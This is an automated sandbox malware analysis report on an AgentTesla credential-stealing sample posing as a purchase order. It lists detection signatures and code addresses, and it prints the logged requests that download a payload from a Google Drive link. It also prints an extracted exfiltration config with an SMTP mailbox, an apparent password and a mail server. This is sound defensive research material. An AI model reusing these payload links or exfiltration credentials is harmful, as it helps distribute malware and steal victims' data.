Windows Analysis Report LISTA DE PEDIDO DE COMPRA.exe

Overview

General Information

Sample Name:	LISTA DE PEDIDO DE COMPRA.exe
Analysis ID:	1373
MD5:	943986d4cb51d4cc29946aa7914dbc5b
SHA1:	cce8ec41fe0fabda407eaa5b8b9efc81168c5e5c
SHA256:	47d8b37351178ed6a40a269f3f42eb23fa0780a9a93098439275f7e66897a924
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected AgentTesla

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: RegAsm connects to smtp port

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to steal Mail credentials (via file access)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Hides threads from debuggers

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

Creates files inside the system directory

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Enables debug privileges

PE file does not import any functions

Sample file is different than original file name gathered from version info

Detected TCP or UDP traffic on non-standard ports

Uses SMTP (mail sending)

Enables security privileges

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Found malware configuration

Source: conhost.exe.3480.30.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "murbano@reyesyasociados.com495QTi314mail.reyesyasociados.comnappiboioffice203@gmail.com"}

Multi AV Scanner detection for submitted file

Source: LISTA DE PEDIDO DE COMPRA.exe

ReversingLabs: Detection: 15%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEA33B8 CryptUnprotectData,		10_2_1FEA33B8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65795C1C4 CreateDirectoryW,FreeLibrary,DecryptFileW,FreeLibrary,FreeLibrary,		26_2_00007FF65795C1C4

Compliance:

Uses 32bit PE files

Source: LISTA DE PEDIDO DE COMPRA.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.11.20:49770 version: TLS 1.2

Source:	Binary string: MpSigStub.pdbGCTL source: mpam-1ba0cab.exe, 00000019.00000003.6149251039.0000020B4D841000.00000004.00000001.sdmp, MpSigStub.exe, 0000001A.00000002.6241664412.00007FF657987000.00000002.00020000.sdmp, MpSigStub.exe.25.dr
Source:	Binary string: MpAdlStub.pdbGCTL source: mpam-1ba0cab.exe, 00000019.00000002.6244546959.00007FF7E3A9F000.00000002.00020000.sdmp
Source:	Binary string: MpAdlStub.pdb source: mpam-1ba0cab.exe, 00000019.00000002.6244546959.00007FF7E3A9F000.00000002.00020000.sdmp
Source:	Binary string: MpSigStub.pdb source: mpam-1ba0cab.exe, 00000019.00000003.6149251039.0000020B4D841000.00000004.00000001.sdmp, MpSigStub.exe, 0000001A.00000002.6241664412.00007FF657987000.00000002.00020000.sdmp, MpSigStub.exe.25.dr

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65795B030 FindNextFileW,FindClose,FindFirstFileW,	26_2_00007FF65795B030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65795ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose,	26_2_00007FF65795ADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65790F810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle,	26_2_00007FF65790F810
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657982504 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	26_2_00007FF657982504

Networking:

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0kmp839hage8unguv37m9lhvdkbnieei/1632762825000/00519186742208262786/*/1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-50-docs.googleusercontent.comConnection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: IOMART-ASGB IOMART-ASGB

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.11.20:49778 -> 109.169.39.245:587

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.11.20:49778 -> 109.169.39.245:587

Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp	String found in binary or memory: http://DXdVhu.com
Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 0000000A.00000002.7779076026.0000000000DFC000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: RegAsm.exe, 0000000A.00000003.3217918693.0000000000E2F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegAsm.exe, 0000000A.00000002.7799376587.000000001FD56000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: RegAsm.exe, 0000000A.00000002.7799692226.000000001FD93000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: RegAsm.exe, 0000000A.00000003.3217918693.0000000000E2F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 0000000A.00000002.7792807129.000000001DC2A000.00000004.00000001.sdmp	String found in binary or memory: http://mail.reyesyasociados.com
Source: RegAsm.exe, 0000000A.00000002.7779076026.0000000000DFC000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: RegAsm.exe, 0000000A.00000002.7779076026.0000000000DFC000.00000004.00000020.sdmp	String found in binary or memory: https://doc-0c-50-docs.googleusercontent.com/
Source: RegAsm.exe, 0000000A.00000003.3217918693.0000000000E2F000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0c-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0kmp839h
Source: RegAsm.exe, 0000000A.00000003.3217918693.0000000000E2F000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0c-50-docs.googleusercontent.com/om~;
Source: RegAsm.exe, 0000000A.00000002.7778539921.0000000000DBA000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: RegAsm.exe, 0000000A.00000002.7778539921.0000000000DBA000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3
Source: RegAsm.exe, 0000000A.00000002.7777894312.0000000000CB0000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3wininet.dllMozilla/5
Source: RegAsm.exe, 0000000A.00000002.7792195736.000000001DBBD000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000003.4120444145.0000000000EB1000.00000004.00000001.sdmp	String found in binary or memory: https://f9WVaLZTFfU.com
Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7791815811.000000001DB74000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/
Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com//
Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/v104
Source: RegAsm.exe, 0000000A.00000002.7799692226.000000001FD93000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: RegAsm.exe, 0000000A.00000002.7791815811.000000001DB74000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0kmp839hage8unguv37m9lhvdkbnieei/1632762825000/00519186742208262786/*/1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-50-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: RegAsm.exe, 0000000A.00000002.7792195736.000000001DBBD000.00000004.00000001.sdmp

String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C

Source: unknown	HTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.11.20:49770 version: TLS 1.2

System Summary:

Detected potential crypto function

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0074C098	10_2_0074C098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00741130	10_2_00741130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0074BA70	10_2_0074BA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00743A50	10_2_00743A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00744320	10_2_00744320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0074C7D0	10_2_0074C7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00743708	10_2_00743708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_007A0158	10_2_007A0158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_007A6988	10_2_007A6988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_007A1420	10_2_007A1420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00A3C2AA	10_2_00A3C2AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00D4D837	10_2_00D4D837
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00D49180	10_2_00D49180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00D44EB0	10_2_00D44EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00D49BD0	10_2_00D49BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00D444F8	10_2_00D444F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00D43330	10_2_00D43330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1C9896C0	10_2_1C9896C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1C98E318	10_2_1C98E318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1C982720	10_2_1C982720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1C983496	10_2_1C983496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1C9834B1	10_2_1C9834B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1C98340B	10_2_1C98340B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1C98357F	10_2_1C98357F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1C98368E	10_2_1C98368E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1C98361B	10_2_1C98361B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1C9833B7	10_2_1C9833B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1C98330A	10_2_1C98330A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1C983363	10_2_1C983363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1D985E08	10_2_1D985E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1D984ACC	10_2_1D984ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1D985DC3	10_2_1D985DC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1D986AF1	10_2_1D986AF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEA5FB8	10_2_1FEA5FB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEA4888	10_2_1FEA4888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEA9700	10_2_1FEA9700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEAA468	10_2_1FEAA468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEA3FE8	10_2_1FEA3FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEA7FF8	10_2_1FEA7FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEA5BA0	10_2_1FEA5BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEAB8A8	10_2_1FEAB8A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEA4877	10_2_1FEA4877
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEA0040	10_2_1FEA0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FEA0021	10_2_1FEA0021
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF6578F86BC	26_2_00007FF6578F86BC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657903728	26_2_00007FF657903728
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65790D038	26_2_00007FF65790D038
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF6578FFF90	26_2_00007FF6578FFF90
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65793490C	26_2_00007FF65793490C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65796B88C	26_2_00007FF65796B88C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65791A818	26_2_00007FF65791A818
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF6579777FC	26_2_00007FF6579777FC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65795F76C	26_2_00007FF65795F76C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF6579215F8	26_2_00007FF6579215F8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657967600	26_2_00007FF657967600
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF6579834D4	26_2_00007FF6579834D4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657969520	26_2_00007FF657969520
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65791C52C	26_2_00007FF65791C52C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657982504	26_2_00007FF657982504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657926480	26_2_00007FF657926480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657972480	26_2_00007FF657972480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF6578F1420	26_2_00007FF6578F1420
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65795E410	26_2_00007FF65795E410
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65797837C	26_2_00007FF65797837C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657920320	26_2_00007FF657920320
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657919278	26_2_00007FF657919278
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65793A288	26_2_00007FF65793A288
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65796C21C	26_2_00007FF65796C21C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65791B20C	26_2_00007FF65791B20C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF6578FB0C8	26_2_00007FF6578FB0C8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657967108	26_2_00007FF657967108
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65796D058	26_2_00007FF65796D058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65797B058	26_2_00007FF65797B058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF657957050	26_2_00007FF657957050
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65790EFCC	26_2_00007FF65790EFCC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65792502C	26_2_00007FF65792502C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe	Code function: 26_2_00007FF65796C034	26_2_00007FF65796C034
